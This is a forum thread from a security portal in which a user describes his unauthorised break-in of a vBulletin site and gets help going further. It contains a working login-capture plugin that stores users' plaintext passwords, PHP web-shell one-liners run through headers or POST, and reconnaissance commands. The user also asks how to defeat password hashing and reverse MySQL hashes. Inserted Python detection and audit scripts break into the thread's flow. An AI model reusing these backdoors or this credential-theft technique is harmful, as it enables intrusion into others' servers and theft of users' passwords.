Waraxe IT Security Portal  
www.waraxe.us Forum Index -> vBulletin Board
Need help finishing the job :D
Posted: Wed Sep 17, 2008 4:08 am
ayvegh (Regular user, joined Sep 17, 2008, 12 posts)
Hi everybody.

I've hacked a very large vBulletin-powered site.
I'm knowledgeable in PHP, MySQL, etc.

I have access to phpMyAdmin using the username/password from the config.php file, and I have installed my own little "swiss army knife" script so I can manipulate things from a script perspective.

I do NOT have FTP access :(

I do know, however, that the Admin of the site uses the same password for everything, so if I can manage to catch his password as he logs in, I will have complete control over the entire server (it's a dedicated rig; I'm able to browse the root of the machine using my script, although obviously my permissions are limited, since I'm running as the PHP user).

I've unobtrusively installed a plugin which catches all logins - here's what the plugin code and save table look like:
Plugin:
Code:
$vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (userid, username, password, password_md5, password_md5_utf, ipaddress) VALUES (" . $vbulletin->userinfo['userid'] . ", '" . $vbulletin->db->escape_string($vbulletin->userinfo['username']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password']) . "', '" . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_md5password_utf']) . "', '" . $vbulletin->db->escape_string(IPADDRESS) . "' )");

Table:
Code:
CREATE TABLE `loginz` (
  `logid` int(10) NOT NULL auto_increment,
  `userid` int(10) NOT NULL default '0',
  `username` varchar(100) NOT NULL default '',
  `password` varchar(255) NOT NULL,
  `password_md5` varchar(255) NOT NULL,
  `password_md5_utf` varchar(255) NOT NULL,
  `ipaddress` varchar(15) NOT NULL default '',
  `date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
  PRIMARY KEY  (`logid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;


What I need to know is: How can I disable the automatic MD5-ing of the password by the JavaScript in the login form?

I know that this line:
Code:
define('DISABLE_PASSWORD_CLEARING', true);

works to do that if it's in the config.php file, but can it be implemented via a plugin?

If not, is there a way I can disable just the JavaScript in the login form (I want to remain relatively undetected, so I won't turn off AJAX for the entire site, even though there is an option for that)?

Any help regarding this will be very much appreciated, and I thank you in advance.

ayvegh
Posted: Wed Sep 17, 2008 5:29 am
pexli (Valuable expert, joined May 24, 2007, 665 posts, Bulgaria)
Try the MySQL password for FTP, the admin panel, etc. If you don't have a shell, upload some small shell on the server and look; maybe this guy has other sites on this server. Search admin panels, passwords, other databases, etc. You need to get owner level and then you can edit login.php and catch the password.
Posted: Wed Sep 17, 2008 5:55 am
ayvegh
koko wrote:
Try the MySQL password for FTP, the admin panel, etc. If you don't have a shell, upload some small shell on the server and look; maybe this guy has other sites on this server. Search admin panels, passwords, other databases, etc. You need to get owner level and then you can edit login.php and catch the password.

I know one of the Admin's passwords, the other one that he uses everywhere.
It's not the same on here, and the MySQL password is randomly generated.

I've gone through every other site hosted on the server; none of them are even live anymore, and none of them have valid password data in them.

What do you mean by "shell"? Do you have any sample shell scripts I could look at?
Posted: Wed Sep 17, 2008 7:07 am
pexli
Something like

Code:
<?php $footer = @getenv('HTTP_FOOTER'); if($footer) {@passthru($footer); exit;} ?>


Working with headers

FOOTER:ls -al
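A site owner reviewing this thread would want a way to spot both artefacts: the plugin in the first post, which stores the raw vb_login_password field in a table of its own, and the one-liner above, which hands a request header straight to passthru. The Python triage script below is an added example, not code from the thread or from vBulletin. Its function names are hypothetical and its sample PHP snippets are constructed to resemble the posted patterns; the checks are deliberately simple pattern matching (a command or eval sink fed from a request-controlled value, and a statement that both reads a raw login field and writes it somewhere), not a PHP parser.

```python
"""Triage checks for the two backdoor shapes discussed in this thread.

Added example, not code from the thread or from vBulletin. Function and
constant names are hypothetical; the sample PHP snippets are constructed.
"""
import re

# Functions that hand a string to the shell or to the PHP interpreter.
SINK_RE = re.compile(
    r"@?\b(passthru|exec|shell_exec|system|popen|proc_open|eval|assert)\s*\(([^;]*)"
)
# Values an HTTP client controls: request headers via getenv('HTTP_*'),
# the request superglobals, and base64_decode (commands smuggled in a URL).
SOURCE_RE = re.compile(
    r"getenv\s*\(\s*['\"]HTTP_|\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|base64_decode\s*\("
)
ASSIGN_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=(?!=)\s*(.+)")
# vBulletin's raw login fields, and calls that persist data.
CRED_RE = re.compile(r"vb_login_password|vb_login_md5password")
WRITE_RE = re.compile(r"query_write|INSERT\s+INTO|file_put_contents|fwrite", re.I)


def _mentions(var, text):
    """True if the PHP variable name appears as a whole token in text."""
    return re.search(re.escape(var) + r"\b", text) is not None


def find_shell_sinks(php_source):
    """Return (line_no, sink) pairs where a client-controlled value reaches a sink.

    Per-file taint tracking: a variable assigned from a source (or from another
    tainted variable) becomes tainted; a sink whose argument list mentions a
    source or a tainted variable is reported. Statements split across lines
    are not followed; this is a lead generator, not a proof.
    """
    tainted = set()
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for stmt in line.split(";"):  # one-liner shells pack several statements per line
            m = ASSIGN_RE.search(stmt)
            if m and (SOURCE_RE.search(m.group(2)) or any(_mentions(v, m.group(2)) for v in tainted)):
                tainted.add(m.group(1))
            for s in SINK_RE.finditer(stmt):
                args = s.group(2)
                if SOURCE_RE.search(args) or any(_mentions(v, args) for v in tainted):
                    findings.append((line_no, s.group(1)))
    return findings


def captures_login_password(php_source):
    """True if one statement both reads a raw login password field and writes it out.

    vBulletin's own login path reads these fields but does not store the raw
    value, so a plugin doing both in a single statement is a strong signal.
    """
    return any(CRED_RE.search(stmt) and WRITE_RE.search(stmt)
               for stmt in php_source.split(";"))


# Constructed samples (not the thread's code), one per pattern.
SAMPLE_HEADER_SHELL = "<?php $c = @getenv('HTTP_X_CMD'); if($c) {@passthru($c); exit;} ?>"
SAMPLE_POST_SHELL = "<?php @exec($_POST['cmd'], $out); print_r($out); ?>"
SAMPLE_BASE64_SHELL = "<?php $p = base64_decode($_GET['q']);\n$r = $p;\neval($r); ?>"
SAMPLE_BENIGN = '<?php $out = NULL; @exec("ls -al /", $out); print_r($out); ?>'
SAMPLE_PLUGIN = (
    '$vbulletin->db->query_write("INSERT INTO " . TABLE_PREFIX . "loginz (username, password) VALUES (\'"'
    " . $vbulletin->db->escape_string($vbulletin->GPC['vb_login_password']) . \"')\");"
)
SAMPLE_LOGIN_READ = "$password = $vbulletin->GPC['vb_login_password'];"


if __name__ == "__main__":
    for label, src in [("header shell", SAMPLE_HEADER_SHELL), ("POST shell", SAMPLE_POST_SHELL),
                       ("base64 shell", SAMPLE_BASE64_SHELL), ("benign", SAMPLE_BENIGN)]:
        print(label, find_shell_sinks(src))
    print("plugin:", captures_login_password(SAMPLE_PLUGIN))
    print("login read only:", captures_login_password(SAMPLE_LOGIN_READ))
```

Run the two functions over every file under the document root and over the PHP stored in the plugin table, and read each hit by hand; the benign sample shows that a sink with a constant argument is not reported. The first post also names DISABLE_PASSWORD_CLEARING in config.php as the switch that turns off the client-side MD5 step, so that define being set without a known reason belongs on the same checklist.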
Posted: Wed Sep 17, 2008 11:49 pm
ayvegh
Hmm... now I'm really confused.

I have read-only access to the root of the filesystem.
What would that script accomplish?

Many thanks,
ayvegh
Posted: Thu Sep 18, 2008 5:23 am
pexli
ayvegh wrote:
Hmm... now I'm really confused.

I have read-only access to the root of the filesystem.
What would that script accomplish?

Many thanks,
ayvegh


This shell doesn't give you root perms: nobody or apache, or in the best case owner/owner.

Try FOOTER:id
Posted: Fri Sep 19, 2008 4:26 am
ayvegh
I hate to sound like such a noob, but I have two questions:

1. What are you trying to accomplish with these shell scripts?

2. How do I use these scripts? <?php exec(); ?> ?

Thanks again,
ayvegh
Posted: Fri Sep 19, 2008 5:32 am
pexli
ayvegh wrote:
I hate to sound like such a noob, but I have two questions:

1. What are you trying to accomplish with these shell scripts?

2. How do I use these scripts? <?php exec(); ?> ?

Thanks again,
ayvegh


1. Social engineering.
2. Only like this: <?php @exec('cmd'); ?>
Working with POST cmd=ls -al
Posted: Fri Sep 19, 2008 5:54 am
ayvegh
Hmm... that's not any form of social engineering I know of, but hey, I'm the noob here, right? ;)

Okay, so I ran this code from my location in the web directory:
Code:
$output = NULL;
@exec("ls -al /", $output);
print_r($output);

And got this output:
Code:
Array
(
    [0] => total 125
    [1] => drwxr-xr-x  22 root root  4096 2007-05-08 12:21 .
    [2] => drwxr-xr-x  22 root root  4096 2007-05-08 12:21 ..
    [3] => drwxr-xr-x   2 root root  4096 2008-06-01 09:17 bin
    [4] => drwxr-xr-x   4 root root  1024 2008-06-01 09:18 boot
    [5] => lrwxrwxrwx   1 root root    11 2007-05-08 12:16 cdrom -> media/cdrom
    [6] => drwxr-xr-x  13 root root  3900 2008-04-02 06:47 dev
    [7] => drwxr-xr-x  72 root root  4096 2008-06-01 09:19 etc
    [8] => drwxr-xr-x   6 root root  4096 2007-07-01 14:59 home
    [9] => drwxr-xr-x   2 root root  4096 2007-05-08 12:17 initrd
    [10] => lrwxrwxrwx   1 root root    28 2007-05-08 12:18 initrd.img -> boot/initrd.img-2.6.18-4-686
    [11] => drwxr-xr-x  12 root root 12288 2008-06-01 09:17 lib
    [12] => drwx------   2 root root 16384 2007-05-08 12:14 lost+found
    [13] => drwxr-xr-x   3 root root  4096 2007-05-08 12:16 media
    [14] => drwxr-xr-x   2 root root  4096 2006-10-28 16:06 mnt
    [15] => drwxr-xr-x   2 root root  4096 2007-05-08 12:17 opt
    [16] => dr-xr-xr-x 183 root root     0 2008-04-02 06:46 proc
    [17] => drwxr-xr-x  11 root root  4096 2008-06-18 14:24 root
    [18] => drwxr-xr-x   2 root root  4096 2008-06-01 09:17 sbin
    [19] => drwxr-xr-x   2 root root  4096 2007-03-07 23:56 selinux
    [20] => drwxr-xr-x   2 root root  4096 2007-05-08 12:17 srv
    [21] => drwxr-xr-x  11 root root     0 2008-04-02 06:46 sys
    [22] => drwxrwxrwt  21 root root 36864 2008-09-19 07:47 tmp
    [23] => drwxr-xr-x  11 root root  4096 2007-05-10 18:32 usr
    [24] => drwxr-xr-x  14 root root  4096 2007-05-10 18:31 var
    [25] => lrwxrwxrwx   1 root root    25 2007-05-08 12:18 vmlinuz -> boot/vmlinuz-2.6.18-4-686
)

What does that do for me, aside from telling me that I can't do much in the root directory (unless I'm reading those chmod letters wrong)?

Thanks again,
ayvegh
Posted: Fri Sep 19, 2008 6:30 am
pexli
Try with pwd
Then ls -al /bla/bla/ from pwd result
Posted: Fri Sep 19, 2008 6:12 pm
ayvegh
Okay, so I've refined my code a bit:
Code:
print_r(shell_exec('pwd'));

All that gives me is the directory string of where my script is located:
Code:
/var/www/[redacted]/www/[redacted]

Doing this:
Code:
print_r(shell_exec('ls -al ' . shell_exec('pwd')));

Gives me the directory listing for my scripts location, which looks like this:
Code:
total 124
drwxrwxrwx  2    10001 www-data  4096 2008-09-15 08:02 .
drwxr-xr-x 26    10001 www-data  4096 2008-09-01 15:59 ..
-rw-r--r--  1    10001 www-data  1848 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  6664 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data     0 2008-04-25 20:50 index.html
-rw-r--r--  1 www-data www-data  6099 2008-09-15 08:01 redacted.php <-- My script, created using an exploit in the ACP ;)
-rw-r--r--  1    10001 www-data  7223 2006-11-24 10:26 redacted.php
-rw-r--r--  1    10001 www-data  5689 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  2108 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  2819 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data 30243 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  7633 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  1659 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  1098 2005-09-16 05:00 redacted.php
-rw-r--r--  1    10001 www-data 10754 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data  3443 2008-04-25 20:50 redacted.php
-rw-r--r--  1    10001 www-data   534 2006-04-05 05:00 redacted.php
-rw-r--r--  1    10001 www-data  4032 2008-04-25 20:50 welcomeblock.php

But I have all of that information already, as I said.
The "My script" highlighted above is what I'm using to execute these commands.

It has a built-in filebrowser/downloader (I'm adding zipping and maybe RAR functions soon), and a code executor, inputted via the address bar in Base64.

So what does this do for me? :)

Thanks again for your patience,
ayvegh
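Read from the site owner's side, the listing above already tells the story: the directory itself is world-writable (drwxrwxrwx), and one file is owned by www-data while everything else belongs to uid 10001, which is exactly how a file created by the web server process stands out from the deployed code. The Python audit below is an added example, not code from the thread; it parses ls -al output and flags those two conditions. Function names are hypothetical and the listing is constructed to mirror the shape of the posted one.

```python
"""Audit an `ls -al` listing of a web root for files the web server wrote.

Added example, not code from the thread. Names are hypothetical; the sample
listing is constructed (a deploy user with uid 10001 owning the files, one
world-writable directory, one file owned by www-data).
"""
import re
from collections import namedtuple

Entry = namedtuple("Entry", "mode links owner group size name")

# GNU `ls -l` with ISO dates: mode links owner group size date time name
LS_RE = re.compile(
    r"^([dl-][rwxsStT-]{9})\s+(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+\S+\s+\S+\s+(.+)$"
)


def parse_listing(text):
    """Parse ls -al output into Entry tuples; lines like 'total N' are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line.strip())
        if m:
            mode, links, owner, group, size, name = m.groups()
            entries.append(Entry(mode, int(links), owner, group, int(size), name))
    return entries


def audit_webroot(text, web_user="www-data"):
    """Return (name, reason) pairs a site owner should look at.

    Two checks: the 'other' write bit (mode[8]) is set, or the entry is owned
    by the web server user instead of the deploy owner. Symlinks always show
    rwxrwxrwx, so the mode check is skipped for them; '..' is outside the
    directory being audited and is skipped entirely.
    """
    findings = []
    for e in parse_listing(text):
        if e.name == "..":
            continue
        if e.mode[0] != "l" and e.mode[8] == "w":
            kind = "directory" if e.mode[0] == "d" else "file"
            findings.append((e.name, "world-writable " + kind))
        if e.owner == web_user:
            findings.append((e.name, "owned by web server user " + web_user))
    return findings


# Constructed listing (not the thread's), same shape as the one posted.
SAMPLE_LISTING = """total 124
drwxrwxrwx  2    10001 www-data  4096 2008-09-15 08:02 .
drwxr-xr-x 26    10001 www-data  4096 2008-09-01 15:59 ..
-rw-r--r--  1    10001 www-data  1848 2008-04-25 20:50 index.php
-rw-r--r--  1 www-data www-data  6099 2008-09-15 08:01 cache_helper.php
-rw-r--r--  1    10001 www-data  4032 2008-04-25 20:50 welcome.php
lrwxrwxrwx  1    10001 www-data    11 2008-04-25 20:50 media -> ../media
"""

if __name__ == "__main__":
    for name, reason in audit_webroot(SAMPLE_LISTING):
        print(f"{name}: {reason}")
```

The `id` output posted later in the thread (uid 33, www-data) is what sets the web_user argument in practice; a deployment where the web server user legitimately owns upload or cache directories would pass those paths through an allow-list before reporting.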
Posted: Fri Sep 19, 2008 8:13 pm
pexli
next command 'id'
Posted: Fri Sep 19, 2008 8:26 pm
ayvegh
Code:
print_r(shell_exec('id'));

gives
Code:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Posted: Sat Sep 20, 2008 8:12 am
pexli
Show me

ls -al /var/www/[redacted]/www/
Posted: Sun Sep 21, 2008 2:07 am
ayvegh
koko wrote:
Show me

ls -al /var/www/[redacted]/www/

No need to post the whole thing - here's a directory and a file:
Code:
total 3110
drwxr-xr-x  4 10001 www-data   4096 2008-09-01 16:18 admincp
-rw-r--r--  1 10001 www-data  39174 2008-01-27 01:00 global.php

Having seen the FTP users database (and having unsuccessfully tried to add a user), I can tell you that userid 10001 is the Admin's FTP account.

Any way to reverse MySQL PASSWORD() hashing? ;)
Page 1 of 2 (all times are GMT)